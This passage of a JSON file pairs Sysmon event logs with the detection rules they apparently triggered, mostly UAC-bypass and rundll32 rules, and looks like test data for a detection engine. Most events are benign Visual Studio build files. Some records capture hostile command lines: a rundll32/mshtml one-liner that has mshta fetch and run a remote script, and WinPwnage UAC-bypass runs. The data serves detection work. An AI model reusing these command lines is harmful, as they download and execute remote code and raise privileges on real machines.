File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:21:13.975","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\AppData\\Local\\Temp\\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd","UtcTime":"2021-01-26 13:21:13.975"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429136,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:13.975732Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:15:06.578","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\source\\repos\\blabla\\blabla\\Debug\\blabla.tlog\\CL.command.1.tlog","UtcTime":"2021-01-26 
13:21:14.363"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429140,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:14.399477Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:21:14.394","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\AppData\\Local\\Temp\\tmp5938b880d43743db91973c95f519f06b.tmp","UtcTime":"2021-01-26 13:21:14.394"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429141,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:14.425366Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - 
File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:21:14.394","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\AppData\\Local\\Temp\\tmp5938b880d43743db91973c95f519f06b.tmp","UtcTime":"2021-01-26 13:21:14.395"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429142,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:14.425472Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:21:14.396","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\AppData\\Local\\Temp\\tmp19546d957b6e4d15b83f93a323d5f087.rsp","UtcTime":"2021-01-26 
13:21:14.396"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429143,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:14.425565Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:21:14.396","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\AppData\\Local\\Temp\\tmp19546d957b6e4d15b83f93a323d5f087.rsp","UtcTime":"2021-01-26 13:21:14.396"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429144,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:14.425664Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on 
MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:21:14.826","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\source\\repos\\blabla\\blabla\\Debug\\blabla.tlog\\CL.write.1.tlog","UtcTime":"2021-01-26 13:21:14.852"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429148,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:14.871509Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:21:14.826","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\source\\repos\\blabla\\blabla\\Debug\\blabla.tlog\\CL.write.1.tlog","UtcTime":"2021-01-26 
13:21:14.853"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429149,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:14.871745Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:21:14.818","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\source\\repos\\blabla\\blabla\\Debug\\blabla.tlog\\CL.read.1.tlog","UtcTime":"2021-01-26 13:21:14.853"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429150,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:14.871980Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification 
- File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:21:14.818","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\source\\repos\\blabla\\blabla\\Debug\\blabla.tlog\\CL.read.1.tlog","UtcTime":"2021-01-26 13:21:14.854"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429151,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:14.872190Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:15:06.578","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\source\\repos\\blabla\\blabla\\Debug\\blabla.tlog\\CL.command.1.tlog","UtcTime":"2021-01-26 
13:21:14.855"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429152,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:14.872564Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:21:23.229","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\devenv.exe","ProcessGuid":"00247C92-172A-6010-0000-00103C3DD02E","ProcessId":7664,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\AppData\\Local\\Microsoft\\VSApplicationInsights\\vstelAIF-312cbd79-9dbb-4c48-a7da-3cc2a931cb70\\20210126132123_277b7688d03b431eb925a7d64307d79a.tmp","UtcTime":"2021-01-26 13:21:23.229"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429153,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:23.229964Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using 
.NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:21:23.302","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\devenv.exe","ProcessGuid":"00247C92-172A-6010-0000-00103C3DD02E","ProcessId":7664,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\AppData\\Local\\Microsoft\\VSApplicationInsights\\vstelAIF-312cbd79-9dbb-4c48-a7da-3cc2a931cb70\\20210126132123_dd350a9897114eee834fb0993b4dee7e.tmp","UtcTime":"2021-01-26 13:21:23.302"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429154,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:23.303639Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:21:23.305","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\devenv.exe","ProcessGuid":"00247C92-172A-6010-0000-00103C3DD02E","ProcessId":7664,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\AppData\\Local\\Microsoft\\VSApplicationInsights\\vstelf144292e-e3b2-4011-ac90-20e5c03fbce5\\20210126132123_195f3c1acef04eaeb6f67d3ff46e5958.tmp","UtcTime":"2021-01-26 
13:21:23.305"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429155,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:23.305903Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:21:33.196","Image":"C:\\windows\\system32\\mmc.exe","ProcessGuid":"00247C92-EC0A-600F-0000-00100AEFCC2C","ProcessId":22932,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\Downloads\\prebuildevent_visual_studio.evtx","UtcTime":"2021-01-26 13:21:33.197"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429156,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:33.197967Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"cmd.exe /C rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();h=new%%20ActiveXObject(\"WScript.Shell\").run(\"mshta 
https://hotelesms.com/talsk.txt\",0,true);","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Desktop\\","Description":"Windows Command Processor","FileVersion":"6.1.7601.17514 (win7sp1_rtm.101119-1850)","Hashes":"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-39CC-5CE3-0000-002096C70000","LogonId":"0xc796","ParentCommandLine":"\"cmd.exe\" /s /k pushd \"C:\\Users\\IEUser\\Desktop\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-4F8A-5CE3-0000-0010C5BB4800","ParentProcessId":3548,"ProcessGuid":"365ABB72-1A29-5CE4-0000-001054E32101","ProcessId":1532,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-21 15:32:57.276"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":4125,"Execution_attributes":{"ProcessID":3416,"ThreadID":3496},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-21T15:32:57.286254Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();h=new%%20ActiveXObject(\"WScript.Shell\").run(\"mshta https://hotelesms.com/talsk.txt\",0,true);","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Desktop\\","Description":"Windows host process (Rundll32)","FileVersion":"6.1.7600.16385 
(win7_rtm.090713-1255)","Hashes":"SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-39CC-5CE3-0000-002096C70000","LogonId":"0xc796","ParentCommandLine":"cmd.exe /C rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();h=new%20ActiveXObject(\"WScript.Shell\").run(\"mshta https://hotelesms.com/talsk.txt\",0,true);","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-1A29-5CE4-0000-001054E32101","ParentProcessId":1532,"ProcessGuid":"365ABB72-1A29-5CE4-0000-00107BE42101","ProcessId":2920,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-21 15:32:57.276"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":4126,"Execution_attributes":{"ProcessID":3416,"ThreadID":3496},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-21T15:32:57.286254Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-05-12 
13:30:46.181","Image":"c:\\python27\\python.exe","ProcessGuid":"365ABB72-1FF8-5CD8-0000-00102A342000","ProcessId":1332,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\ieframe.url","UtcTime":"2019-05-12 13:30:46.181"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":16387,"Execution_attributes":{"ProcessID":2032,"ThreadID":1996},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-05-12T13:30:46.181756Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\rundll32.exe\" ieframe.dll,OpenURL c:\\users\\ieuser\\appdata\\local\\temp\\ieframe.url","Company":"Microsoft Corporation","CurrentDirectory":"c:\\Users\\IEUser\\Downloads\\WinPwnage-master\\WinPwnage-master\\","Description":"Windows host process (Rundll32)","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-1596-5CD8-0000-0020103A0100","LogonId":"0x13a10","ParentCommandLine":"python winpwnage.py -u execute -i 9 -p c:\\Windows\\system32\\cmd.exe","ParentImage":"C:\\Python27\\python.exe","ParentProcessGuid":"365ABB72-1FF8-5CD8-0000-00102A342000","ParentProcessId":1332,"ProcessGuid":"365ABB72-2006-5CD8-0000-0010A2862300","ProcessId":2960,"Product":"Microsoft® Windows® Operating 
System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-12 13:30:46.213"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16388,"Execution_attributes":{"ProcessID":2032,"ThreadID":1996},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-12T13:30:46.400506Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"rundll32.exe url.dll,OpenURL file://C:/Windows/system32/calc.exe","Company":"Microsoft Corporation","CurrentDirectory":"c:\\Users\\IEUser\\Downloads\\WinPwnage-master\\WinPwnage-master\\","Description":"Windows host process (Rundll32)","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-1596-5CD8-0000-0020103A0100","LogonId":"0x13a10","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-2006-5CD8-0000-0010E0912300","ParentProcessId":2936,"ProcessGuid":"365ABB72-208A-5CD8-0000-0010119B2400","ProcessId":3560,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-12 
13:32:58.167"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16390,"Execution_attributes":{"ProcessID":2032,"ThreadID":1996},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-12T13:32:58.167195Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"rundll32.exe url.dll,FileProtocolHandler calc.exe","Company":"Microsoft Corporation","CurrentDirectory":"c:\\Users\\IEUser\\Downloads\\WinPwnage-master\\WinPwnage-master\\","Description":"Windows host process (Rundll32)","FileVersion":"6.1.7600.16385 